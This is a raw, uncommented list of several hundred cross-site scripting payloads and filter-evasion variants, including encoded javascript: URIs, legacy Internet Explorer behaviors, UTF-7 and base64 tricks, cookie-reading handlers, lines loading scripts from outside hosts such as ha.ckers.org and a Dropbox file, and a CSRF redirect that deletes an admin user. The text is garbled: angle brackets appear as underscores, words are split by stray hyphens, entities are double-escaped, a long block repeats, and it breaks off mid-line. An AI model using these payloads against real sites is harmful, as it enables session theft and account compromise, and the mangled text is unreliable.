1&TS&1_alert&A7&(1)&R&UA;&&_-
&A9&11/script&X&_
_meta charset="mac-farsi"_¼script¾javascript:alert(1)¼/s-
cript¾
X_x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` _
1_set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:-
alert(1)&gt;`_
1_animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascri-
pt:alert(1)&gt;_
_vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100-
%;height:100% src=%(vml)s#xss__/vmlframe_
1_a href=#__line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /__/a_
_a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)"_XXX_/a_
_x style="behavior:url(%(sct)s)"_
_xml id="xss" src="%(htc)s"__/xml_ _label dataformatas="html" datasrc="#xss" datafld="payload"__/label_
_event-source src="%(event)s" onload="javascript:alert(1)"_
_a href="javascript:javascript:alert(1)"__event-sourc-
e src="data:application/x-dom-event-stream,Event:click%0A-
data:XXX%0A%0A"_
_div id="x"_x_/div_ _xml:namespace prefix="t"_ _import namespace="t" implementation="#default#time2"_ _t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11-
;=javascript:alert(1)&gt;"_
_script_%(payload)s_/script_
_script src=%(jscript)s__/script_
_script language='javascript' src='%(jscript)s'__/script_
_script_javascript:alert(1)_/script_
_IMG SRC="javascript:javascript:alert(1);"_
_IMG SRC=javascript:javascript:alert(1)_
_IMG SRC=`javascript:javascript:alert(1)`_
_SCRIPT SRC=%(jscript)s?_B_
_FRAMESET__FRAME SRC="javascript:javascript:alert(1);"__/FRAMESET_<-
br /> _BODY ONLOAD=javascript:alert(1)_
_BODY ONLOAD=javascript:javascript:alert(1)_
_IMG SRC="jav ascript:javascript:alert(1);"_
_BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)_
_SCRIPT/SRC="%(jscript)s"__/SCRIPT_
__SCRIPT_%(payload)s//__/SCRIPT_
_IMG SRC="javascript:javascript:alert(1)"
_iframe src=%(scriptlet)s _
_INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"_
_IMG DYNSRC="javascript:javascript:alert(1)"_
_IMG LOWSRC="javascript:javascript:alert(1)"_
_BGSOUND SRC="javascript:javascript:alert(1);"_
_BR SIZE="&{javascript:alert(1)}"_
_LAYER SRC="%(scriptlet)s"__/LAYER_
_LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"_
_STYLE_@import'%(css)s';_/STYLE_
_META HTTP-EQUIV="Link" Content="_%(css)s_; REL=stylesheet"_
_XSS STYLE="behavior: url(%(htc)s);"_
_STYLE_li {list-style-image: url("javascript:javascript:alert(1)");}_/STYLE__UL-
__LI_XSS
_META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"_r /> _META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"_
_IFRAME SRC="javascript:javascript:alert(1);"__/IFRAME_
_TABLE BACKGROUND="javascript:javascript:alert(1)"_
_TABLE__TD BACKGROUND="javascript:javascript:alert(1)"_
_DIV STYLE="background-image: url(javascript:javascript:alert(1))"_
_DIV STYLE="width:expression(javascript:alert(1));"_
_IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"-
_
_XSS STYLE="xss:expression(javascript:alert(1))"_
_STYLE TYPE="text/javascript"_javascript:alert(1);_/STYLE-
_
_STYLE_.XSS{background-image:url("javascript:javasc-
ript:alert(1)");}_/STYLE__A CLASS=XSS__/A_
_STYLE type="text/css"_BODY{background:url("javascri-
pt:javascript:alert(1)")}_/STYLE_
_!--[if gte IE 4]__SCRIPT_javascript:alert(1);_/SCRIPT__![endif]--_
_BASE HREF="javascript:javascript:alert(1);//"_
_OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"__/OBJECT_
_OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389__param name=url value=javascript:javascript:alert(1)__/OBJECT_
_HTML xmlns:xss__?import namespace="xss" implementation="%(htc)s"__xss:xss_XSS_/xss:xss__/H-
TML_""","XML namespace."),("""_XML ID="xss"__I__B_&lt;IMG SRC="javas_!-- --_cript:javascript:alert(1)"&gt;_/B__/I__/XML__SPA-
N DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"__/SPAN_
_HTML__BODY__?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"__?import namespace="t" implementation="#default#time2"__t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"-
;__/BODY__/HTML_
_SCRIPT SRC="%(jpg)s"__/SCRIPT_
_HEAD__META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"_ _/HEAD_+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
_form id="test" /__button form="test" formaction="javascript:javascript:alert(1)"_X
_body onscroll=javascript:alert(1)__br__br__br__br__br__br__br__br-
__br__br__br__br__br__br__br__br__br__br__br__br__br__br__br-
__br__br__br__br__br__br__br__br__br__br__br__br__br__br__br-
__br__br__input autofocus_
_P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"_
_STYLE_@import'%(css)s';_/STYLE_
_STYLE_a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}_/STYLE_
_meta charset= "x-imap4-modified-utf7"&&_&&_scrip-
t&&_javascript:alert(1)&&;&&_&&a-
mp;/script&&_
_SCRIPT onreadystatechange=javascript:javascript:alert(1);__/SCRIPT_-

_style onreadystatechange=javascript:javascript:alert(1);__/style_<-
br /> _?xml version="1.0"?__html:html xmlns:html='http://www.w3.org/1999/xhtml'__html:script_javas-
cript:alert(1);_/html:script__/html:html_
_embed code=%(scriptlet)s__/embed_
_embed code=javascript:javascript:alert(1);__/embed_
_embed src=%(jscript)s__/embed_
_frameset onload=javascript:javascript:alert(1)__/frameset_
_object onerror=javascript:javascript:alert(1)_
_embed type="image" src=%(scriptlet)s__/embed_
_XML ID=I__X__C__![CDATA[_IMG SRC="javas]]_![CDATA[cript:javascript:alert(1);"_]-
]_/C__X__/xml_
_IMG SRC=&{javascript:alert(1);};_
_a href="jav&#65ascript:javascript:alert(1)"_test-
1_/a_
_a href="jav&#97ascript:javascript:alert(1)"_test-
1_/a_
_embed width=500 height=500 code="data:text/html,_script_%(payload)s_/script_"-
__/embed_
_iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&a-
mp;sol;src=&amp;apos;&amp;apos;onerror=javascript:al-
ert(1)&amp;gt;_"_
';alert(String.fromCharCode(88,83,83))//';alert(String.f-
romCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(Strin-
g.fromCharCode(88,83,83))//--
__/SCRIPT_"_'__SCRIPT_alert(String.fromCharCode(88,-
83,83))_/SCRIPT_
'';!--"_XSS_=&{()}
_SCRIPT SRC=http://ha.ckers.org/xss.js__/SCRIPT_
_IMG SRC="javascript:alert('XSS');"_
_IMG SRC=javascript:alert('XSS')_
_IMG SRC=JaVaScRiPt:alert('XSS')_
_IMG SRC=javascript:alert("XSS")_
_IMG SRC=`javascript:alert("RSnake says, 'XSS'")`_
_a onmouseover="alert(document.cookie)"_xxs link_/a_
_a onmouseover=alert(document.cookie)_xxs link_/a_
_IMG """__SCRIPT_alert("XSS")_/SCRIPT_&q-
uot;_
_IMG SRC=javascript:alert(String.fromCharCode(88,83,83))_
_IMG SRC=# onmouseover="alert('xxs')"_
_IMG SRC= onmouseover="alert('xxs')"_
_IMG onmouseover="alert('xxs')"_
_IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99-
;&#114;&#105;&#112;&#116;&#58;&#97;&-
amp;#108;&#101;&#114;&#116;&#40;&#39;&am-
p;#88;&#83;&#83;&#39;&#41;_
_IMG SRC=&#0000106&#0000097&#0000118&#0000097&-
;#0000115&#0000099&#0000114&#0000105&#000011-
2&#0000116&#0000058&#0000097&#0000108&#0-
000101&#0000114&#0000116&#0000040&#0000039&a-
mp;#0000088&#0000083&#0000083&#0000039&#0000-
041_
_IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&a-
mp;#x72&#x69&#x70&#x74&#x3A&#x61&#x6-
C&#x65&#x72&#x74&#x28&#x27&#x58&-
#x53&#x53&#x27&#x29_
_IMG SRC="jav ascript:alert('XSS');"_
_IMG SRC="jav&#x09;ascript:alert('XSS');"_
_IMG SRC="jav&#x0A;ascript:alert('XSS');"_
_IMG SRC="jav&#x0D;ascript:alert('XSS');"_
perl -e 'print "_IMG SRC=java\0script:alert(\"XSS\")_";' _ out
_IMG SRC=" &#14; javascript:alert('XSS');"_
_SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")_<-
br /> _SCRIPT/SRC="http://ha.ckers.org/xss.js"__/SCR-
IPT_
__SCRIPT_alert("XSS");//__/SCRIPT_
_SCRIPT SRC=http://ha.ckers.org/xss.js?_ B _
_SCRIPT SRC=//ha.ckers.org/.j_
_IMG SRC="javascript:alert('XSS')"
_iframe src=http://ha.ckers.org/scriptlet.html _
\";alert('XSS');//
_/TITLE__SCRIPT_alert("XSS");_/SCRIPT_
_INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"_
_BODY BACKGROUND="javascript:alert('XSS')"_
_IMG DYNSRC="javascript:alert('XSS')"_
_IMG LOWSRC="javascript:alert('XSS')"_
_STYLE_li {list-style-image: url("javascript:alert('XSS')");}_/STYLE__UL__LI_XS-
S_/br_
_IMG SRC='vbscript:msgbox("XSS")'_
_IMG SRC="livescript:[code]"_
_BODY ONLOAD=alert('XSS')_
_BGSOUND SRC="javascript:alert('XSS');"_
_BR SIZE="&{alert('XSS')}"_
_LINK REL="stylesheet" HREF="javascript:alert('XSS');"_
_LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"_
_STYLE_@import'http://ha.ckers.org/xss.css';_/STYLE_
_META HTTP-EQUIV="Link" Content="_http://ha.ckers.org/xss.css_; REL=stylesheet"_
_STYLE_BODY{-moz-binding:url("http://ha.ckers.org/x-
ssmoz.xml#xss")}_/STYLE_
_STYLE_@im\port'\ja\vasc\ript:alert("XSS")';_/-
STYLE_
_IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"_
exp/*_A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pres-
sion(alert("XSS"))'_
_STYLE TYPE="text/javascript"_alert('XSS');_/STYLE_
_STYLE_.XSS{background-image:url("javascript:alert(-
'XSS')");}_/STYLE__A CLASS=XSS__/A_
_STYLE type="text/css"_BODY{background:url("javascri-
pt:alert('XSS')")}_/STYLE_
_STYLE type="text/css"_BODY{background:url("javascri-
pt:alert('XSS')")}_/STYLE_
_XSS STYLE="xss:expression(alert('XSS'))"_
_XSS STYLE="behavior: url(xss.htc);"_
¼script¾alert(¢XSS¢)¼/script¾
_META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"_
_META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"_
_META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"_
_IFRAME SRC="javascript:alert('XSS');"__/IFRAME_
_IFRAME SRC=# onmouseover="alert(document.cookie)"__/IFRAME_
_FRAMESET__FRAME SRC="javascript:alert('XSS');"__/FRAMESET_
_TABLE BACKGROUND="javascript:alert('XSS')"_
_TABLE__TD BACKGROUND="javascript:alert('XSS')"_
_DIV STYLE="background-image: url(javascript:alert('XSS'))"_
_DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061-
\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065-
\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"_r /> _DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"_
_DIV STYLE="width: expression(alert('XSS'));"_
_BASE HREF="javascript:alert('XSS');//"_
_OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"__/OBJECT-
_
_EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0-
dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My-
5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5-
L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhl-
aWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxl-
cnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"__/EMBED_
_SCRIPT SRC="http://ha.ckers.org/xss.jpg"__/SCRIPT_
_!--#exec cmd="/bin/echo '_SCR'"--__!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js__/SCRIPT_'"--_
_? echo('_SCR)';echo('IPT_alert("XSS")_/SCRIPT_'); ?_
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
_META HTTP-EQUIV="Set-Cookie" Content="USERID=_SCRIPT_alert('XSS')_/SCRIPT_"_
_HEAD__META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"_ _/HEAD_+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
_SCRIPT a="_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT ="_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_" '' SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT "a='_'" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a=`_` SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT a="_'_" SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_SCRIPT_document.write("_SCRI");_/SCRIPT_PT SRC="http://ha.ckers.org/xss.js"__/SCRIPT_
_A HREF="http://66.102.7.147/"_XSS_/A_
_A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D-
"_XSS_/A_
_A HREF="http://1113982867/"_XSS_/A_
_A HREF="http://0x42.0x0000066.0x7.0x93/"_XSS_/A_
_A HREF="http://0102.0146.0007.00000223/"_XSS_/A_
_A HREF="htt p://6 6.000146.0x7.147/"_XSS_/A_
_iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00_r /> _svg__style_{font-family&colon;'_iframe/onload=confi-
rm(1)_'
_input/onmouseover="javaSCRIPT&colon;confirm&am-
p;lpar;1&rpar;"
_sVg__scRipt %00_alert&lpar;1&rpar; {Opera}
_img/src=`%00` onerror=this.onerror=confirm(1)
_form__isindex formaction="javascript&colon;confirm(1)"
_img src=`%00`&NewLine; onerror=alert(1)&NewLine;
_script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;__/script_
_ScRipT 5-0*3+9/3=_prompt(1)_/ScRipT giveanswerhere=?
_iframe/src="data:text/html;&Tab;base64&Tab-
;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="_
_script /*%00*/_/*%00*/alert(1)/*%00*/_/script /*%00*/
&#34;&#62;_h1/onmouseover='\u0061lert(1)'_%00
_iframe/src="data:text/html,_svg &#111;&#110;load=alert(1)_"_
_meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/_
_svg__script xlink:href=data&colon;,window.open('https://www.google.c-
om/')__/script
_svg__script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
_meta http-equiv="refresh" content="0;url=javascript:confirm(1)"_
_iframe src=javascript&colon;alert&lpar;document&period;-
location&rpar;_
_form__a href="javascript:\u0061lert&#x28;1&#x29;"_-
X
_/script__img/*%00/src="worksinchrome&colon;pro-
mpt&#x28;1&#x29;"/%00*/onerror='eval(src)'_
_img/&#09;&#10;&#11; src=`~` onerror=prompt(1)_
_form__iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10-
;&#09;;_
_a href="data:application/x-x509-user-cert;&NewLine;ba-
se64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="-
&#09;&#10;&#11;_X_/a
http://www.google_script .com_alert(document.location)_/script
_a&#32;href&#61;&#91;&#00;&#93;"-
;&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;"-
;_XYZ_/a
_img/src=@&#32;&#13; onerror = prompt('&#49;')
_style/onload=prompt&#40;'&#88;&#83;&#83-
;'&#41;
_script ^__^_alert(String.fromCharCode(49))_/script ^__^
_/style &#32;__script &#32; :-(_/**/alert(document.location)/**/_/script &#32; :-(
&#00;_/form__input type&#61;"date" onfocus="alert(1)"_
_form__textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;-
'_
_script /***/_/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF-
11\u1450')/***/_/script /***/
_iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'_
_a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;_X_-
/a_
_script ~~~_alert(0%0)_/script ~~~_
_style/onload=&lt;!--&#09;&gt;&#10;alert-
&#10;&lpar;1&rpar;_
_///style///__span %2F onmousemove='alert&lpar;1&rpar;'_SPAN
_img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
&#34;&#62;_svg__style_{-o-link-source&colon;-
'_body/onload=confirm(1)_'
&#13;_blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)_OnMouseOver {Firefox & Opera}
_marquee onstart='javascript:alert&#x28;1&#x29;'_^__^
_div/style="width:expression(confirm(1))"_X_/d-
iv_ {IE7}
_iframe/%00/ src=javaSCRIPT&colon;alert(1)
//_form/action=javascript&#x3A;alert&lpar;docume-
nt&period;cookie&rpar;__input/type='submit'_//
/*iframe/src*/_iframe/src="_iframe/src=@"/onlo-
ad=prompt(1) /*iframe/src*/_
//|\\ _script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'_ //|\\ _/script //|\\
_/font_/_svg__style_{src&#x3A;'_style/onload=this.on-
load=confirm(1)_'_/font_/_/style_
_a/href="javascript:&#13; javascript:prompt(1)"__input type="X"_
_/plaintext\__/|\__plaintext/onmouseover=prompt(1)
_/svg_''_svg__script 'AQuickBrownFoxJumpsOverTheLazyDog'_alert&#x28;1&#x2-
9; {Opera}
_a href="javascript&colon;\u0061&#x6C;&#101%72-
t&lpar;1&rpar;"__button_
_div onmouseover='alert&lpar;1&rpar;'_DIV_/div_
_iframe style="position:absolute;top:0;left:0;width:100%;height-
:100%" onmouseover="prompt(1)"_
_a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;&q-
uot;_X_/a_
_embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trun-
k/misc/pdf/helloworld_js_X.pdf"_
_object data="http://corkami.googlecode.com/svn/!svn/bc/480/tru-
nk/misc/pdf/helloworld_js_X.pdf"_
_var onmouseover="prompt(1)"_On Mouse Over_/var_
_a href=javascript&colon;alert&lpar;document&period-
;cookie&rpar;_Click Here_/a_
_img src="/" =_=" title="onerror='prompt(1)'"_
_%_!--'%__script_alert(1);_/script --_
_script src="data:text/javascript,alert(1)"__/script_
_iframe/src \/\/onload = prompt(1)
_iframe/onreadystatechange=alert(1)
_svg/onload=alert(1)
_input value=___iframe/src=javascript:confirm(1)
_input type="text" value=`` _div/onmouseover='alert(1)'_X_/div_
http://www._script_alert(1)_/script .com
_iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v-
&NewLine;&Tab;&Tab;&Tab;a&NewLine;&T-
ab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Ta-
b;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab-
;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;-
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&-
NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta-
b;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab-
;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&-
;NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&T-
ab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewL-
ine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&a-
mp;Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&am-
p;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;-
&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&-
amp;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta-
b;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&am-
p;NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&-
Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&a-
mp;Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&am-
p;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;-
&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;-
&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&T-
ab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&am-
p;Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&-
;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&-
amp;Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Ta-
b;&Tab;%29__/iframe_
_svg__script ?_alert(1)
_iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&-
Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&-
;Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29-
__/iframe_
_img src=`xx:xx`onerror=alert(1)_
_object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "__/object_
_meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/_
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always_
_svg contentScriptType=text/vbs__script_MsgBox+1
_a href="data:text/html;base64_,_svg/onload=\u0061&#x6-
C;&#101%72t(1)_"_X_/a
_iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u007-
4('\u0061') worksinIE_
_script_~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')_/script U+
_script/src="data&colon;text%2Fj\u0061v\u0061sc-
ript,\u0061lert('\u0061')"__/script a=\u0061 & /=%2F
_script/src=data&colon;text/j\u0061v\u0061&#115&-
amp;#99&#114&#105&#112&#116,\u0061%6C%65%72%-
74(/XSS/)__/script
_object data=javascript&colon;\u0061&#x6C;&#101%72t(1)_<-
br /> _script_+-+-1-+-+alert(1)_/script_
_body/onload=&lt;!--&gt;&#10alert(1)_
_script itworksinallbrowsers_/*_script* */alert(1)_/script
_img src ?itworksonchrome?\/onerror = alert(1)
_svg__script_//&NewLine;confirm(1);_/script _/svg_
_svg__script onlypossibleinopera:-)_ alert(1)
_a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)_Click-
Me
_script x_ alert(1) _/script 1=2
_div/onmouseover='alert(1)'_ style="x:"_
_--`_img/src=` onerror=alert(1)_ --!_
_script/src=&#100&#97&#116&#97:text/&-
;#x6a&#x61&#x76&#x61&#x73&#x63&#x72&-
amp;#x69&#x000070&#x074,&#x0061;&#x06c;&-
#x0065;&#x00000072;&#x00074;(1)__/script_
_div style="position:absolute;top:0;left:0;width:100%;height-
:100%" onmouseover="prompt(1)" onclick="alert(1)"_x_/button_
"__img src=x onerror=window.open('https://www.google.com/');_
_form__button formaction=javascript&colon;alert(1)_CLICKME
_math__a xlink:href="//jsfiddle.net/t846h/"_click
_object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+__/ob-
ject_
_iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%7-
2%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"__/iframe_
_a href="data:text/html;blabla,&#60&#115&#99&a-
mp;#114&#105&#112&#116&#32&#115&#114-
&#99&#61&#34&#104&#116&#116&#112-
&#58&#47&#47&#115&#116&#101&#114-
&#110&#101&#102&#97&#109&#105&#1-
08&#121&#46&#110&#101&#116&#47&#-
102&#111&#111&#46&#106&#115&#34&-
#62&#60&#47&#115&#99&#114&#105&#-
112&#116&#62&#8203"_Click Me_/a_
‘; alert(1);
‘)alert(1);//
_ScRiPt_alert(1)_/sCriPt_
_IMG SRC=jAVasCrIPt:alert(‘XSS’)_
_IMG SRC=”javascript:alert(‘XSS’);”_
_IMG SRC=javascript:alert(&quot;XSS&quot;)_
_IMG SRC=javascript:alert(‘XSS’)_
_img src=xss onerror=alert(1)_
_iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00_r /> _svg__style_{font-family&colon;'_iframe/onload=confi-
rm(1)_'
_input/onmouseover="javaSCRIPT&colon;confirm&am-
p;lpar;1&rpar;"
_sVg__scRipt %00_alert&lpar;1&rpar; {Opera}
_img/src=`%00` onerror=this.onerror=confirm(1)
_form__isindex formaction="javascript&colon;confirm(1)"
_img src=`%00`&NewLine; onerror=alert(1)&NewLine;
_script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;__/script_
_ScRipT 5-0*3+9/3=_prompt(1)_/ScRipT giveanswerhere=?
_iframe/src="data:text/html;&Tab;base64&Tab-
;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="_
_script /*%00*/_/*%00*/alert(1)/*%00*/_/script /*%00*/
&#34;&#62;_h1/onmouseover='\u0061lert(1)'_%00
_iframe/src="data:text/html,_svg &#111;&#110;load=alert(1)_"_
_meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/_
_svg__script xlink:href=data&colon;,window.open('https://www.google.c-
om/')__/script
_svg__script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
_meta http-equiv="refresh" content="0;url=javascript:confirm(1)"_
_iframe src=javascript&colon;alert&lpar;document&period;-
location&rpar;_
_form__a href="javascript:\u0061lert&#x28;1&#x29;"_-
X
_/script__img/*%00/src="worksinchrome&colon;pro-
mpt&#x28;1&#x29;"/%00*/onerror='eval(src)'_
_img/&#09;&#10;&#11; src=`~` onerror=prompt(1)_
_form__iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10-
;&#09;;_
_a href="data:application/x-x509-user-cert;&NewLine;ba-
se64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="-
&#09;&#10;&#11;_X_/a
http://www.google_script .com_alert(document.location)_/script
_a&#32;href&#61;&#91;&#00;&#93;"-
;&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;"-
;_XYZ_/a
_img/src=@&#32;&#13; onerror = prompt('&#49;')
_style/onload=prompt&#40;'&#88;&#83;&#83-
;'&#41;
_script ^__^_alert(String.fromCharCode(49))_/script ^__^
_/style &#32;__script &#32; :-(_/**/alert(document.location)/**/_/script &#32; :-(
&#00;_/form__input type&#61;"date" onfocus="alert(1)"_
_form__textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;-
'_
_script /***/_/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF-
11\u1450')/***/_/script /***/
_iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'_
_a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;_X_-
/a_
_script ~~~_alert(0%0)_/script ~~~_
_style/onload=&lt;!--&#09;&gt;&#10;alert-
&#10;&lpar;1&rpar;_
_///style///__span %2F onmousemove='alert&lpar;1&rpar;'_SPAN
_img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
&#34;&#62;_svg__style_{-o-link-source&colon;-
'_body/onload=confirm(1)_'
&#13;_blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)_OnMouseOver {Firefox & Opera}
_marquee onstart='javascript:alert&#x28;1&#x29;'_^__^
_div/style="width:expression(confirm(1))"_X_/d-
iv_ {IE7}
_iframe/%00/ src=javaSCRIPT&colon;alert(1)
//_form/action=javascript&#x3A;alert&lpar;docume-
nt&period;cookie&rpar;__input/type='submit'_//
/*iframe/src*/_iframe/src="_iframe/src=@"/onlo-
ad=prompt(1) /*iframe/src*/_
//|\\ _script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'_ //|\\ _/script //|\\
_/font_/_svg__style_{src&#x3A;'_style/onload=this.on-
load=confirm(1)_'_/font_/_/style_
_a/href="javascript:&#13; javascript:prompt(1)"__input type="X"_
_/plaintext\__/|\__plaintext/onmouseover=prompt(1)
_/svg_''_svg__script 'AQuickBrownFoxJumpsOverTheLazyDog'_alert&#x28;1&#x2-
9; {Opera}
_a href="javascript&colon;\u0061&#x6C;&#101%72-
